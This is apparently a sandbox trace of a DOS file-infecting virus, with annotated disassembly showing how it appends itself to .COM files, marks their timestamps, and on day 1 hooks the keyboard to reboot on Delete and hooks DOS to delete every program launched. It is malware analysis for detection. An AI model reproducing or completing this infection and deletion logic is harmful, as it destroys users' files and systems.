2018-12-25T11:51:03.227039373Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.231396135Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.243043053Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.251332672Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.26008001Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.262136271Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.265202722Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.269695872Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.271421475Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.274439946Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.277208028Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.285920782Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.297785833Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.302447204Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.317144355Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.324949809Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.33254862Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.334821426Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.337655145Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.348557561Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.352434098Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.360378049Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.362583246Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.373692181Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.387786436Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.391505089Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.403989493Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.413176988Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.420829797Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.423691298Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.427039919Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.431403801Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.43319062Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.437160972Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.438993065Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.447424367Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.459809164Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.462664086Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.473548995Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.4814152Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.488528663Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.490091109Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.493246573Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.501971807Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.503854088Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.50824658Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.5103362Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.519241639Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.531653954Z 79 PC: 12b7b | Find next file (See above)
; Disassembly window the sandbox attached to the "Get date" trace row: 16-bit
; real-mode code, Intel operand order. It holds the date trigger, the message
; call, and then two handler bodies that the install path jumps over
; (jmp 0x12c48). The window ends inside the second handler.
; This run was configured with "Day":1 (run header above), so the je branch is
; taken: the trace rows that follow show the message, two get/set interrupt
; vector pairs and a terminate-and-stay-resident exit.
; NOTE(review): those rows label vectors 9 and 33 with INT 21h *function*
; names ('Display string', 'Random read'). The vectors being replaced are the
; keyboard hardware interrupt (INT 9) and the DOS service interrupt
; (33 = 0x21), which matches the two handler bodies below.
; Analyst note: replaced INT 9 / INT 21h vectors followed by a resident exit
; are the behaviours worth alerting on in this run.
2018-12-25T11:51:03.535007895Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1   ; DL = day of month returned by Get date (AH=2Ah)
0x12c10: je 0x12c14                      ; day 1: continue into the payload setup
0x12c12: jmp 0x12c7b                     ; any other day: skip to the exit path at 0x12c7b
0x12c14: mov ah, 9                       ; AH=09h display '$'-terminated string at DS:DX
0x12c16: lea dx, word ptr [bp + 0x25b]   ; DS:DX = message text in the bp-relative data area
0x12c1a: int 0x21                        ; trace: Display string 'Bad command or filename'
0x12c1c: jmp 0x12c48                     ; jump over the handler bodies; the trace logs the vector get/set calls from PC 12c4d onward
0x12c1e: push ax                         ; handler body, presumably the INT 9 (keyboard) hook: preserve AX
0x12c1f: in al, 0x60                     ; read the scancode from the keyboard data port
0x12c21: cmp al, 0x53                    ; 0x53 = make code of the Delete key
0x12c23: je 0x12c2b                      ; Delete pressed: take the restart path
0x12c25: pop ax                          ; any other key: restore AX
0x12c26: ljmp ptr cs:[0x27f]             ; chain through the far pointer at cs:0x27f, presumably the saved original INT 9 vector
0x12c2b: ljmp 0xffff:0                   ; far jump to FFFF:0000, the PC reset entry point, so the machine restarts
0x12c30: iret                            ; not reachable by fall-through from the far jump above; role not visible in this window
0x12c31: cmp ax, 0x4b00                  ; handler body, presumably the INT 21h hook: AX=4B00h is EXEC (load and execute program)
0x12c34: jne 0x12c3a                     ; other requests skip the next two instructions
0x12c36: mov ah, 0x41                    ; AH=41h delete file; DS:DX is untouched, so it still points at the program name passed to EXEC
0x12c38: int 0x21                        ; issues the delete, so the program being launched is removed from disk
0x12c3a: cmp ax, 0x4b9f                  ; not a standard EXEC sub-function; possibly the sample's own residency check - TODO confirm (window ends here)
2018-12-25T11:51:03.537801197Z 9 PC: 12c1c | Display string (String= 'Bad command or filename')
2018-12-25T11:51:03.540921273Z 53 PC: 12c4d | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:51:03.543034022Z 37 PC: 12c5f | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:51:03.544632508Z 53 PC: 12c64 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:03.546294374Z 37 PC: 12c76 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:03.54872194Z 49 PC: 12c7b | Terminate and stay resident (Return code = '0' | Memory size = '34')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4145,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:03.116408303Z 26 PC: 12b70 | Set disk transfer address
2018-12-25T11:51:03.118546476Z 78 PC: 12b7b | Find first file
2018-12-25T11:51:03.124762889Z 67 PC: 12b9b | Get or set file attributes
2018-12-25T11:51:03.141401222Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:03.156264032Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:03.163425207Z 66 PC: 12bb8 | Move file pointer
; Disassembly window the sandbox attached to the "Get time" trace row of this
; run: 16-bit real-mode code, Intel operand order, calling DOS services
; through INT 21h. The window starts and ends mid-routine. It covers the tail
; of the per-file step that the following trace rows record: rewrite of the
; first 3 bytes at offset 0, timestamp change, close.
; NOTE(review): BX is never loaded in this window; it presumably still holds
; the file handle (5 in the trace) from the earlier open - confirm against the
; full listing.
; Analyst note: the and/or pair at 0x12be9 forces the seconds field of every
; rewritten file's timestamp to the same constant. Presumably that is the
; sample's "already processed" marker, which would make it a usable triage
; indicator - confirm against the check earlier in the routine.
2018-12-25T11:51:03.165370006Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx   ; save DX as returned by Get time (AH=2Ch: DH=seconds, DL=hundredths); use not visible here
0x12bcb: call 0x22b39                    ; trace logs the 380-byte write at PC 12b47 right after this row, so the target is presumably 0x12b39 (16-bit IP wrap; 0x22b39 looks like a disassembler artefact) - TODO confirm
0x12bce: cdq                             ; one-byte opcode in 16-bit code, i.e. CWD: DX = sign-extension of AX (0 when AX is non-negative)
0x12bcf: sub cx, cx                      ; CX = 0, high word of the seek offset
0x12bd1: mov ax, 0x4200                  ; AH=42h move file pointer, AL=00h = relative to start of file, offset CX:DX
0x12bd4: int 0x21                        ; trace: "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]   ; DS:DX = 3-byte buffer inside the bp-relative data area
0x12bda: mov cx, 3                       ; byte count
0x12bdd: mov ah, 0x40                    ; AH=40h write to handle
0x12bdf: int 0x21                        ; trace: "Write 3 bytes on handle 5"; replaces the host's first 3 bytes, presumably with a jump to the appended body
0x12be1: mov dx, word ptr [bp + 0x29f]   ; DX = date word for AX=5701h; presumably the DTA date field - TODO confirm
0x12be5: mov cx, word ptr [bp + 0x29d]   ; CX = time word for AX=5701h; presumably the DTA time field - TODO confirm
0x12be9: and cl, 0xe0                    ; clear bits 0-4, the 2-second field of a DOS packed time
0x12bec: or cl, 0x15                     ; force that field to 0x15 (21 units = 42 seconds)
0x12bef: mov ax, 0x5701                  ; AH=57h AL=01h set file date and time
0x12bf2: int 0x21                        ; trace: "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e                    ; AH=3Eh close handle
0x12bf6: int 0x21                        ; trace: "Close file" (PC 12bf8)
0x12bf8: lea dx, word ptr [bp + 0x2a5]   ; DS:DX = another bp-relative buffer; presumably the file name for the attribute call the trace logs at PC 12c07
0x12bfc: sub cx, cx                      ; CX = 0; the INT 21h that consumes it lies outside this window
2018-12-25T11:51:03.167999821Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-25T11:51:03.177157853Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:51:03.178704551Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:03.185574553Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:51:03.191781893Z 62 PC: 12bf8 | Close file
2018-12-25T11:51:03.199858378Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:51:03.208942257Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.212380988Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.219988947Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.224170737Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.230755182Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.232274095Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.234673895Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.237800504Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.240244301Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.242904823Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.244314399Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.249471253Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.258859704Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.261735435Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.27465512Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.282031752Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.288358336Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.290909074Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.293250146Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.296082029Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.298520617Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.301000824Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.302327908Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.310230929Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.320167987Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.322757837Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.333405892Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.348266745Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.364485504Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.36625468Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.369087847Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.372061919Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.37367025Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.377331426Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.378786286Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.385970008Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.396244234Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.398795373Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.408622313Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.415970964Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.422093442Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.423426033Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.426668508Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.42949919Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.430849455Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.433883254Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.435523367Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.454157687Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.464833354Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.468319459Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.479080462Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.486558751Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.493507991Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.495168799Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.498496976Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.507257132Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.50859172Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.515910442Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.517732708Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.525225955Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.536156435Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.539215413Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.54950908Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.557113434Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.563353861Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.564787516Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.567365308Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.570605119Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.572040943Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.574635859Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.57755815Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.584531134Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.593954207Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.596782274Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.608895201Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.615391366Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.621975237Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.623549879Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.62598742Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.63445511Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.635990836Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.638873615Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.641921223Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.649291007Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.658782398Z 79 PC: 12b7b | Find next file (See above)
; Disassembly window the sandbox attached to the "Get date" trace row of this
; run: 16-bit real-mode code, Intel operand order. It holds the date trigger,
; the message call, and then two handler bodies that the install path jumps
; over (jmp 0x12c48). The window ends inside the second handler.
; This run was configured with "Day":2 (run header above), so the je branch is
; not taken: the trace shows no message and no interrupt-vector changes, only
; "Set disk transfer address" and "Terminate with return code" after this row.
; Analyst note: the payload is date-gated, so a single run on an arbitrary
; date under-reports this sample's behaviour; only the file rewrites show up.
2018-12-25T11:51:03.661965401Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1   ; DL = day of month returned by Get date (AH=2Ah)
0x12c10: je 0x12c14                      ; day 1: continue into the payload setup
0x12c12: jmp 0x12c7b                     ; any other day: skip to the exit path at 0x12c7b (the path taken in this run)
0x12c14: mov ah, 9                       ; AH=09h display '$'-terminated string at DS:DX
0x12c16: lea dx, word ptr [bp + 0x25b]   ; DS:DX = message text in the bp-relative data area
0x12c1a: int 0x21                        ; not reached in this run
0x12c1c: jmp 0x12c48                     ; jump over the handler bodies to code outside this window
0x12c1e: push ax                         ; handler body, presumably an INT 9 (keyboard) hook: preserve AX
0x12c1f: in al, 0x60                     ; read the scancode from the keyboard data port
0x12c21: cmp al, 0x53                    ; 0x53 = make code of the Delete key
0x12c23: je 0x12c2b                      ; Delete pressed: take the restart path
0x12c25: pop ax                          ; any other key: restore AX
0x12c26: ljmp ptr cs:[0x27f]             ; chain through the far pointer at cs:0x27f, presumably the saved original INT 9 vector
0x12c2b: ljmp 0xffff:0                   ; far jump to FFFF:0000, the PC reset entry point, so the machine restarts
0x12c30: iret                            ; not reachable by fall-through from the far jump above; role not visible in this window
0x12c31: cmp ax, 0x4b00                  ; handler body, presumably an INT 21h hook: AX=4B00h is EXEC (load and execute program)
0x12c34: jne 0x12c3a                     ; other requests skip the next two instructions
0x12c36: mov ah, 0x41                    ; AH=41h delete file; DS:DX is untouched, so it still points at the program name passed to EXEC
0x12c38: int 0x21                        ; issues the delete, so the program being launched is removed from disk
0x12c3a: cmp ax, 0x4b9f                  ; not a standard EXEC sub-function; possibly the sample's own residency check - TODO confirm (window ends here)
2018-12-25T11:51:03.664031901Z 26 PC: 12c84 | Set disk transfer address
2018-12-25T11:51:03.664987299Z 76 PC: 12a5b | Terminate with return code (Return code = '1')